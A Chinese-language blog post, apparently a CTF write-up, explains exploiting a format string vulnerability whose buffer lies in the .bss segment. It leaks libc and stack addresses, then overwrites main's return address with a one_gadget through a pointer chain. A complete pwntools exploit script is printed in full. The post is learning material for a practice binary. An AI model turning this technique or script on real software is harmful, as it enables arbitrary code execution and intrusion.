非栈上格式化字符串漏洞

最新推荐文章于 2024-05-30 09:02:27 发布
最新推荐文章于 2024-05-30 09:02:27 发布
阅读量409 收藏 5
点赞数 10
分类专栏: pwn知识总结 文章标签: 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_66751120/article/details/136232104
版权

一、简介

之前写的都是在栈上的格式化字符串漏洞,那么今天学习非栈上,顾名思义就是在bss段或者堆上,由于作者没有学到堆,所以只写了在bss段上的。同时这道例题也是对上篇手搓格式化字符串漏洞payload的延伸与巩固,那么直接通过题来学习。

https://blog.csdn.net/weixin_66751120/article/details/136167826

二、例题

七次带有格式化字符串漏洞的循环,同时跟进buf后,并不是在栈上,而是在bss段。

根据之前写的经验,肯定要用libc基址与one_gadget,然后修改主函数的返回地址,那么用老方法找偏移时,就会发现找不到,当然,它不在栈上,自然测不了,那么随便输入几个%p,再根据gdb中内容,来观察泄露的位置,再不断修改得到正确的libc start main +243的地址,以及一个随便的栈地址,做完这些前置条件,重点就来了

蓝色框就是main函数的返回地址,绿线是一条随机的有a->b->c的链,因为我们使用%c只能修改c位置,并且这些栈地址只有最后两位不一样,如果我们能够把c位置指针修改为返回地址的栈地址,那么会构成a->b->c->d的链子,那就一定存在b->c->d的链子,而且d位置就是原来的main函数返回地址,那么就可以在这条链子中将d位置最后两字节修改为one_gagdet的尾两字节

这样之后如果继续按照原来的方式就会发现错误,第三个指针依然指的是返回地址的栈地址的尾两字节,而我们要修改前两个字节了,那就需要把上面构造的方式再用一次,让原来的返回地址栈地址加2就可以,与修改尾两字节相同的方式,再写一次,

然后one_gadget的地址与返回地址前两字节相同,改不改都可以,如果不改的话,需要再跑两次循环使七次循环结束。

下面是完整exp:

from pwn import*
context(os='linux',arch='amd64',log_level='debug')
elf=ELF('./pwn2')
p = process("./pwn2")
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
def bug():
	gdb.attach(p)
	pause() 

p.recvuntil(b'hello\n')
pay=b'%9$p%11$p'
bug()
p.send(pay)
p.recvuntil(b'0x')
libc_base=int(p.recv(12),16)-243-libc.sym['__libc_start_main']
print(hex(libc_base))
p.recvuntil(b'0x')
stack=int(p.recv(12),16)
print(hex(stack))
one_gadget=0xe3b01+libc_base
print(hex(one_gadget))
main=stack-240
stack1=main+0x10

p.recvuntil(b'hello\n')
pay=(b'%'+str(main&0xffff).encode()+b'c%11$hn').ljust(0x28,b'\x00')+p64(stack1)
pause()
p.send(pay)

p.recvuntil(b'hello\n')
pay=(b'%'+str(one_gadget&0xffff).encode()+b'c%39$hn').ljust(0x28,b'\x00')+p64(stack)
pause()
p.send(pay)

p.recvuntil(b'hello\n')
main=main+2
pay=(b'%'+str(main&0xffff).encode()+b'c%11$hn').ljust(0x28,b'\x00')+p64(stack1+2)
pause()
p.send(pay)

p.recvuntil(b'hello\n')
pay=(b'%'+str(one_gadget>>16&0xffff).encode()+b'c%39$hn').ljust(0x28,b'\x00')+p64(stack+2)
pause()
p.send(pay)

p.recvuntil(b'hello\n')
main=main+2
pay=(b'%'+str(main&0xffff).encode()+b'c%11$hn').ljust(0x28,b'\x00')+p64(stack1+4)
pause()
p.send(pay)

p.recvuntil(b'hello\n')
pay=(b'%'+str(one_gadget>>32).encode()+b'c%39$hn').ljust(0x28,b'\x00')+p64(stack+4)
pause()
p.send(pay)

p.interactive()

每个pay最后的p64()是写栈上格式化字符串漏洞时栈对齐时需要的,由于这里不在栈上,那么这里不加就可以。

江屿..
关注
  • 10
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
非栈上的格式化字符串漏洞利用
qq_52877079的博客
03-25 319
对于常规的栈上格式化字符串漏洞,可以直接构造(%c %n 指针)的方式来实现任意地址写,但是对于非栈上变量来说,就无法直接给出目的地址的指针,因为printf的参数保存在寄存器和栈上面。对于非栈上变量,格式化字符串漏洞依然存在,可以考虑借助已有的栈上指针来实现间接地利用。
格式化字符串漏洞1
08-04
1、 可控的参数 2、 参数类型错误 3、 格式化字符串参数和传入参数不符 1、没有输入参数 2、带有输入参数: 1、 栈上没有定义参数 2、栈上存在定义的参数
格式化字符串漏洞非栈格式化字符串漏洞
2301_79879963的博客
03-14 846
int printf("格式化字符串",参量...)参数的返回值是正确输出的字符的个数,如果输出失败,返回负值参量表中的参数的个数是不定的(参数的个数可以是一个,两个,三个...)格式化字符串函数有很多,例如输入:scanf;printf输出到 stdoutfprintf输出到指定 FILE 流vprintf根据参数列表格式化输出到 stdoutvfprintf根据参数列表格式化输出到指定 FILE 流sprintf输出到字符串snprintf输出指定字节数到字符串
格式化字符串修改将非栈上地址修改
T_Fire_of_Square的博客
04-02 160
ez格式化字符串
[CTF]PWN--非栈格式化字符串漏洞
2301_79880752的博客
02-26 1817
一般来说,栈上的格式化字符串漏洞利用步骤是先泄露地址,包括ELF程序地址和libc地址;然后将需要改写的GOT表地址直接传到栈上,同时利用%c%n的方法改写入地址,最后就是劫持流程。但是对于BSS段或是堆上格式化字符串,也就是非栈格式化字符串漏洞,无法直接将想要改写的地址指针放置在栈上,也就没办法实现任意地址写。本文主要为大家介绍BSS段上的格式化字符串漏洞的解法。
非栈上的格式化字符串漏洞
Grxer的博客
03-20 705
利用1处栈地址,也就是将0xffffcfa8地址处内容0xffffcfb8修改为0xffffcfac,由于开启pie保护,0xffffcfac处所存内容是elf文件所存地址+pie基址生成的,got表也在elf文件的数据区,也是有地址+pie基地址生成,所以我们只需要利用%$hn修改其低四位即可(小端序),buf地址可以利用%$p泄露,这样我们就可以输入buf为printf_got+payload,修改其got为system地址。(目标文件该节在磁盘不占空间,在运行时,内存分配,初始化0))
Canary机制及绕过策略-格式化字符串漏洞泄露Canary
02-24
我们知道,在32位系统上,对于栈溢出漏洞,攻击者通常是通过溢出栈缓冲区,覆盖栈上保存的函数返回地址来达到劫持程序执行流的目的。Stackcanary保护机制在刚进入函数时,在栈上放置一个标志canary,然后在函数结束...
基于源代码的软件同源性分析与漏洞检测系统
01-12
根据格式化字符串漏洞原理分析使用的格式化函数是否存在溢出的问题,给出可疑代码行数与列数。 提供样本库 提供漏洞检测与同源性检测样本库,样本数量不少于10个,每个代码行数不少于100行;每种漏洞至少一个。 ...
vulnerability_detect:在基于补丁的漏洞发现中,用于确定差异函数是否是漏洞函数
05-11
程序输入受外界不安全控制(如存在文件读取、网络接收等,则可能/Users/pengjiaqi/Documents/iie/binary_analyses/差异函数漏洞检测/README_html.rtf引入异常)format string 格式化字符串对于每类异常,均有各自的...
CTF[PWN]--栈迁移、格式化字符串漏洞、随机数撞库
2301_79880752的博客
03-11 734
开启NX,64位,动态编译,IDA分析:两次读入,第一次读入结束给了我们read函数的地址,第二次读入可以栈溢出,但是只能覆盖一个返回地址,自然而然的想到了栈迁移,因为第一次给了我们地址,就可以通过偏移去求出第二次read读入的起始地址由于本题给了提示,用的是ubuntu 16.04,因此libc库应为libc2.23(后来才知道,由于之前做题都是打本地,导致当时做这题的时候本地脚本写的很快,但在连接远程libc时却花了大功夫)
不满6位补零 字符串_非栈格式化字符串漏洞利用技巧
weixin_39617669的博客
12-25 254
0x00前言关于Linux栈上格式化字符串漏洞的利用网上已经有许多讲解了,但是非栈上的格式化字符串漏洞很少有人介绍。这里主要以上周末SUCTF比赛中playfmt题目为例,详细介绍一下bss段上或堆上的格式化字符串利用技巧。0x01基础知识点格式化字符串漏洞的具体原理就不再详细叙述,这里主要简单介绍一下格式化参数位置的计算和漏洞利用时常用的格式字符。参数位置计算linux下32位程序是栈传参,从左...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8254
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
登录安全分析报告:小米官网注册
Explinks的博客
05-29 953
图形验证及交互验证方式的安全性到底如何?请看具体分析。
导线防碰撞警示灯:高压线路安全保障
最新发布
dxzhkj888888的博客
05-30 290
同时,警示灯的反光材料也起到了至关重要的作用,无论是白天还是夜晚,都能将光线反射到最远的距离,让警示效果倍增。导线防碰撞警示灯也叫高压线太阳能警示灯、户外高压线路夜间红色闪光灯,以其独特的设计和卓越的性能,成为了电力安全领域的保障。在广袤的大地上,高压线路如同血脉般纵横交错,然而,在这看似平静的电力输送背后,却隐藏着不容忽视的安全隐患。而到了夜晚,警示灯便开始了它的使命。导线防碰撞警示灯的出现,使得那些驾驶超高车辆、操作超高施工机械的司机们,也在警示灯的提醒下,更加谨慎地行驶和操作,避免了可能发生的危险。
网络学习(九)|深入解析Cookie与Session:高级应用及安全实践
weixin_44435110的博客
05-28 689
通过本以上,后端开发人员可以深入了解Cookie和Session的高级应用、常见问题及其解决方案,有助于设计和实现高效、安全的会话管理系统。
内网安全-隧道搭建&穿透上线&内网穿透-nps自定义上线&内网渗透-Linux上线-cs上线Linux主机
rumil的博客
05-28 1525
nps内网穿透工具是一款轻量级、高性能、功能强大的内网代理服务器。支持tcp、udp、socks5、http等几乎所有流量转发,可用于访问内网网站、支付本地接口调试、ssh访问、远程桌面,内网dns解析、内网socks5代理等等……,并带有功能强大的web管理端。一个轻量级、高性能、强大的内网穿透代理服务器,带有强大的web管理端。 内网渗透-CS上线Linux主机-Linux上线
如何在OrangePi AIpro智能小车上实现安全强化学习算法
越努力,越幸运!
05-28 2653
无人驾驶试点——守住安全底线
goodxianping的专栏
05-27 363
更让人担忧的是,在一些企业急功近利的营销攻势下,过度包装自动驾驶技术的成熟度,“美化”技术缺陷,出现了安全隐患被人为掩盖,驾驶者放松警惕,甚至对无人驾驶出现错误认知而引发的安全事故。比如,在保障运输安全的前提下,鼓励在封闭式快速公交系统等场景使用自动驾驶汽车从事城市公共汽(电)车客运经营活动,在交通状况简单、条件相对可控的场景使用自动驾驶汽车从事出租汽车客运经营活动,在点对点干线公路运输、具有相对封闭道路等场景使用自动驾驶汽车从事道路普通货物运输经营活动。同时,对自动驾驶汽车安全使用也提出了新的要求。
printf 格式化字符串漏洞
12-07
printf格式化字符串漏洞是一种常见的安全漏洞,它是由于程序员在使用printf等函数时没有正确处理格式化字符串而导致的。攻击者可以通过在格式化字符串中插入特定的字符序列来执行任意代码或者读取敏感信息。攻击者...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

江屿..

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值